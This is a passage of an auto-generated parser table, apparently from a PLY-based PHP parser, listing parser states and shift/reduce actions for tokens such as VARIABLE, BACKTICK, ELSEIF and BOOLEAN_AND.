32,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,98,-3,-2,-4,-5,-6,98,-50,-443,98,98,98,98,98,-47,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-443,98,98,-23,98,-48,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-38,-40,-42,-443,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,-8,-443,98,-30,-22,-24,-25,-26,98,-11,471,-12,98,98,-39,-41,-43,-44,98,-45,471,-46,98,98,-56,98,98,98,98,98,98,98,98,-7,98,-9,98,98,-28,471,471,471,471,98,98,98,98,98,98,98,-443,98,471,98,98,98,98,98,98,-10,-29,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,471,-443,-443,98,98,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,471,-111,98,98,98,-27,471,471,-443,-62,98,98,98,-51,-55,98,471,471,471,-110,98,98,-31,-64,98,-34,98,-85,98,-443,-443,-443,471,-109,471,471,98,-65,-71,98,-36,-83,-443,-443,-92,-93,-86,-87,98,-61,98,98,471,98,-443,-35,-76,-443,98,-443,98,-88,-54,-108,471,471,98,-32,98,98,98,-63,-84,-443,-443,-77,98,-443,98,-52,98,]),'START_NOWDOC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,99,-3,-2,-4,-5,-6,99,-50,-443,99,99,99,99,99,-47,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-443,99,99,-23,99,-48,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-38,-40,-42,-443,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-8,-443,99,-30,-22,-24,-25,-26,99,-11,99,-12,99,99,-39,-41,-43,-44,99,-45,99,-46,99,99,-56,99,99,99,99,99,99,99,99,-7,99,-9,99,99,-28,99,99,99,99,99,99,99,99,99,99,99,-443,99,99,99,99,99,99,99,99,-10,-29,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,-443,-443,99,99,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,99,-111,99,99,99,-27,99,99,-443,-62,99,99,99,-51,-55,99,99,99,99,-110,99,99,-31,-64,99,-34,99,-85,99,-443,-443,-443,99,-109,99,99,99,-65,-71,99,-36,-83,-443,-443,-92,-93,-86,-87,99,-61,99,99,99,99,-443,-35,-76,-443,99,-443,99,-88,-54,-108,99,99,99,-32,99,99,99,-63,-84,-443,-443,-77,99,-443,99,-52,99,]),'BACKTICK':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,103,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,258,265,266,267,268,270,275,276,277,284,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,420,421,422,423,424,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,491,499,500,501,528,532,533,535,537,540,545,556,557,559,560,566,570,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,657,679,682,691,692,693,694,703,740,741,742,746,748,751,752,759,762,763,776,796,799,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,901,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,103,-3,-2,-4,-5,-6,103,-50,-443,103,103,103,103,103,-47,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-443,-443,103,103,-23,103,-48,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-38,-40,-42,103,103,-443,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,-432,103,437,103,103,103,-8,-443,103,103,-30,-22,-24,-25,-26,103,-11,-12,103,103,-39,-41,-43,-44,103,-45,-46,103,103,-56,103,103,103,103,-431,-433,-434,103,103,103,103,103,-7,103,-9,103,103,-28,103,103,103,103,103,103,103,103,103,-443,103,103,103,103,103,103,103,103,103,103,103,103,-10,-29,-443,-443,103,103,-33,-70,-443,103,-37,-49,-443,-53,-57,-60,-443,-111,103,103,-436,-437,103,-439,-27,-443,-62,103,103,103,103,103,-51,-55,103,-110,103,-435,103,103,-31,-64,103,-34,103,-85,103,-443,-443,-443,-109,103,-65,-71,103,-36,-83,-443,-443,-92,-93,-86,-87,103,-61,103,103,-438,103,-443,-35,-76,-443,103,-443,103,-88,-54,-108,103,-32,103,103,103,-63,-84,-443,-443,-77,103,-443,103,-52,103,]),'DOLLAR':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,26,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,114,119,120,121,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,349,351,352,354,355,356,360,361,375,389,391,394,395,404,407,410,411,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,646,657,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,790,796,797,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,105,-3,-2,-4,-5,-6,105,-50,-443,105,105,105,105,173,105,-47,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-443,105,105,-23,105,-48,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-38,-40,-42,105,105,-443,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-8,-443,105,105,-30,-22,-24,-25,-26,105,-11,473,-12,105,105,-39,-41,-43,-44,173,105,-45,473,-46,105,105,-56,105,105,105,105,105,105,105,105,105,105,105,105,105,105,-7,105,-9,105,105,-28,473,473,473,473,105,105,105,105,105,105,105,105,105,-443,105,473,105,105,105,105,105,105,105,105,105,105,105,-10,-29,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,-443,-443,105,105,-33,-70,-443,105,-37,-49,-443,-53,-57,-60,-443,473,-111,105,105,105,-27,473,473,-443,-62,105,105,105,105,105,-51,-55,105,473,473,473,-110,105,105,105,105,105,-31,-64,105,-34,105,-85,105,-443,-443,-443,473,-109,473,473,105,-65,-71,105,-36,-83,-443,-443,-92,-93,-86,-87,105,-61,105,105,473,105,-443,-35,-76,-443,105,-443,105,-88,-54,-108,473,473,105,-32,105,105,105,-63,-84,-443,-443,-77,105,-443,105,-52,105,]),'VARIABLE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,26,27,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,76,98,103,105,111,114,116,117,119,120,121,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,186,191,192,193,194,195,196,197,198,199,200,201,202,205,209,217,218,222,244,245,246,251,256,257,258,260,261,262,265,266,267,268,270,275,276,277,279,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,349,351,352,353,354,355,356,360,361,365,366,375,389,391,392,394,395,404,407,410,411,420,421,422,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,509,510,516,528,529,532,533,535,537,540,545,550,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,648,652,657,660,662,664,665,666,667,668,669,670,671,672,679,682,691,692,693,694,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,775,776,779,788,790,796,797,799,803,806,811,813,814,820,822,825,826,832,835,836,837,839,841,850,851,860,861,862,867,868,869,870,871,874,875,876,877,878,880,881,882,883,884,886,894,901,907,908,909,910,911,912,913,914,915,917,918,921,924,927,928,934,935,937,938,940,942,944,951,954,955,962,963,964,967,972,973,975,],[-443,107,-3,-2,-4,-5,-6,107,-50,-443,107,107,107,107,172,176,107,-47,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,-443,-443,-443,107,-190,-443,-429,-430,107,107,-23,107,-48,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,-38,-40,-42,107,107,-443,-443,107,107,107,107,107,107,107,107,107,107,107,107,107,-187,107,107,107,107,107,107,107,107,422,-432,107,107,422,107,422,107,107,107,-8,-443,107,-428,107,-30,-22,-24,-25,-26,107,-11,107,-12,107,107,-39,-41,-43,-44,172,107,-45,176,107,-46,107,107,-56,508,422,107,107,107,-188,107,107,107,107,107,107,-431,-433,-434,107,107,107,107,107,-7,107,-9,107,107,-28,107,107,107,107,107,107,107,107,107,107,107,107,107,-443,107,107,508,647,649,-117,107,-189,107,107,107,107,107,107,687,107,107,107,107,-10,-29,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,107,-443,-443,107,107,-33,-70,-443,107,-37,-49,-443,-53,-57,-60,-443,508,107,772,-118,-111,786,-152,-153,-159,-163,-164,-165,-166,-160,-161,-162,107,107,-436,-437,107,-439,-27,107,107,-443,-62,107,107,107,107,107,-51,-55,107,107,107,107,-119,-110,786,-158,107,107,107,-435,107,107,-31,-64,107,-34,107,-85,107,-443,-443,-443,887,107,-109,896,107,107,107,-65,-71,107,-36,-83,-443,-443,-92,-93,-86,-87,916,107,-61,107,107,922,107,-438,107,-443,-35,-76,-443,107,-443,107,-88,-54,-108,943,107,508,107,107,-32,107,107,107,956,508,-63,-84,-443,-443,-77,107,-443,107,-52,107,]),'$end':([0,1,2,3,4,5,6,7,10,29,130,164,166,168,275,285,292,295,345,346,347,348,352,355,361,441,443,500,566,613,620,621,630,634,636,637,638,639,657,740,741,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,963,973,],[-443,0,-1,-3,-2,-4,-5,-6,-50,-47,-48,-38,-40,-42,-8,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-7,-9,-443,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'RBRACE':([3,4,5,6,7,10,12,13,29,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,114,116,117,120,121,130,132,164,166,168,180,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,275,276,277,278,279,285,286,287,288,289,292,295,300,301,302,303,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,345,346,347,348,352,355,360,361,373,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,439,440,441,442,443,445,449,478,480,481,482,483,484,486,494,500,511,519,522,523,524,525,527,529,530,531,536,544,546,547,548,549,552,553,554,558,561,562,563,564,565,566,570,613,618,619,620,621,630,631,634,636,637,638,639,650,654,655,657,658,673,674,675,676,677,685,686,695,698,701,702,703,740,741,743,745,754,755,756,759,762,774,776,777,789,791,792,794,798,801,802,804,805,811,813,817,818,820,825,828,832,835,836,841,844,849,852,853,854,856,857,862,867,869,870,874,875,876,877,878,881,882,883,884,890,892,893,898,899,900,902,903,909,910,913,914,915,917,918,919,925,930,931,935,940,946,951,954,955,963,964,966,967,968,969,971,973,974,975,976,977,],[-3,-2,-4,-5,-6,-50,-362,-443,-47,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-443,-429,-430,285,-23,-48,-443,-38,-40,-42,-443,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-8,-443,443,-364,-428,-30,-22,-24,-25,-26,-11,-12,-443,-443,-244,-248,-250,-241,484,-242,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-39,-41,-43,-44,-45,-46,500,-56,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,564,565,-7,566,-9,-209,-28,-184,-221,-243,-245,618,-238,-320,633,-443,-353,-443,657,-130,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,692,-361,694,698,701,-218,-235,-236,-240,-10,-29,-443,-249,-319,-33,-70,-37,-443,-49,-443,-53,-57,-60,-443,776,-136,-111,-129,-196,789,-191,-194,792,-205,-223,-210,-231,-232,-211,-27,-443,-62,-220,818,825,-443,-89,-51,-55,841,-110,-135,-231,-193,-232,-199,-222,-212,-213,-214,-215,-31,-64,-246,-247,-34,-85,877,-443,-443,-443,-109,-139,-132,-443,-134,-195,-443,901,-65,-71,-36,-83,-443,-92,-93,-86,-87,917,-61,918,919,-138,-443,-141,930,-123,-224,-216,-217,-35,-76,-443,-91,-88,-54,-108,-271,946,-133,-122,-32,-90,-140,-63,-84,-443,-77,973,-131,-443,-157,-126,-128,-52,-137,977,-127,-156,]),'YIELD':([10,13,29,120,121,130,164,166,168,180,285,286,287,288,289,345,346,347,348,352,355,360,361,449,500,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-50,-443,-47,291,-23,-48,-38,-40,-42,-443,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,291,-56,-28,-443,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,291,291,-51,-55,291,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,291,-61,291,291,-443,-35,-76,-443,291,-443,291,-88,-54,-108,-32,291,291,291,-63,-84,-443,-443,-77,291,-443,291,-52,291,]),'ELSEIF':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,812,-62,-443,-51,-55,-110,-31,-64,864,-66,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-443,-77,-67,-52,]),'ELSE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,814,-62,-443,-51,-55,-110,-31,-64,866,-66,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-443,-77,-67,-52,]),'ENDIF':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,614,620,621,630,634,636,637,638,639,657,703,740,741,742,759,762,776,811,813,815,816,820,825,841,862,863,865,867,869,870,877,878,882,908,909,910,915,917,918,935,937,951,954,962,963,972,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-443,-51,-55,-110,-31,-64,-443,-66,-34,-85,-109,-65,906,-68,-71,-36,-83,-86,-87,-61,-443,-35,-76,-88,-54,-108,-32,-69,-63,-84,-443,-77,-67,-52,]),'ENDWHILE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,622,630,634,636,637,638,639,657,703,740,741,746,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,819,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'ENDDECLARE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,640,657,703,740,741,759,762,763,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,-51,-55,833,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-88,-54,-108,-32,-63,-84,-77,-52,]),'ENDFOREACH':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,657,703,740,741,759,762,776,811,813,820,825,841,862,867,869,870,871,877,878,882,909,910,912,915,917,918,935,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-443,-86,-87,-61,-35,-76,939,-88,-54,-108,-32,-63,-84,-77,-52,]),'CASE':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,631,632,634,636,637,638,639,657,703,740,741,754,755,756,757,758,759,762,776,811,813,820,825,828,830,841,862,867,869,870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,826,-443,-89,826,-443,-51,-55,-110,-31,-64,-34,-85,826,826,-109,-65,-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'DEFAULT':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,631,632,634,636,637,638,639,657,703,740,741,754,755,756,757,758,759,762,776,811,813,820,825,828,830,841,862,867,869,870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,827,-443,-89,827,-443,-51,-55,-110,-31,-64,-34,-85,827,827,-109,-65,-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'ENDSWITCH':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,632,634,636,637,638,639,657,703,740,741,756,757,758,759,762,776,811,813,820,825,830,841,862,867,869,870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,-89,829,-443,-51,-55,-110,-31,-64,-34,-85,879,-109,-65,-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'ENDFOR':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,657,703,740,741,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,911,915,917,918,935,938,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-443,-88,-54,-108,-32,953,-63,-84,-77,-52,]),'OBJECT_OPERATOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,422,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,131,-429,-180,-251,-430,-344,256,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,131,-190,-429,-430,131,131,131,131,131,-370,-323,-324,-443,-185,-186,-187,394,-225,-228,-198,131,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,131,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,131,131,-443,-443,-244,-248,-250,131,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,131,131,131,131,131,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,131,131,-345,131,-443,-352,551,-365,-385,-229,-366,-230,-357,-358,-219,131,131,-209,131,-184,-221,-243,-245,131,-238,-320,131,131,-353,-182,-234,-229,-189,-443,-230,-252,131,131,-333,-336,-337,-346,-443,131,-361,131,131,-218,-235,-236,-240,-249,-319,131,131,-196,131,790,-194,131,797,-223,-210,-231,-232,-211,-220,131,-231,-193,-232,-199,131,-222,131,-212,-213,-214,-215,-246,-247,-195,-443,131,-224,-216,-217,131,-271,131,]),'BOOLEAN_AND':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,133,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,133,-190,-429,-430,133,133,133,133,133,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,133,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,133,133,133,133,133,133,-348,-363,-227,-228,-349,-364,-428,133,133,-443,-443,-244,-248,-250,133,-289,133,133,133,133,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,-183,-197,-188,-253,133,133,-345,133,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,133,133,-209,133,-429,571,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,133,-238,133,133,133,-353,-182,-234,-229,-189,-443,-230,-252,133,133,-333,-336,-337,-346,-443,133,-361,133,133,-218,-235,-236,-240,-392,-393,571,-380,-390,571,-402,-249,133,133,133,-196,133,-191,-194,133,-205,-223,-210,-231,-232,-211,-403,571,571,571,571,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,133,-231,-193,-232,133,133,-222,133,-212,-213,-214,-215,-394,571,-402,571,-246,-247,-195,-443,133,-224,-216,-217,571,133,-271,571,133,571,]),'BOOLEAN_OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,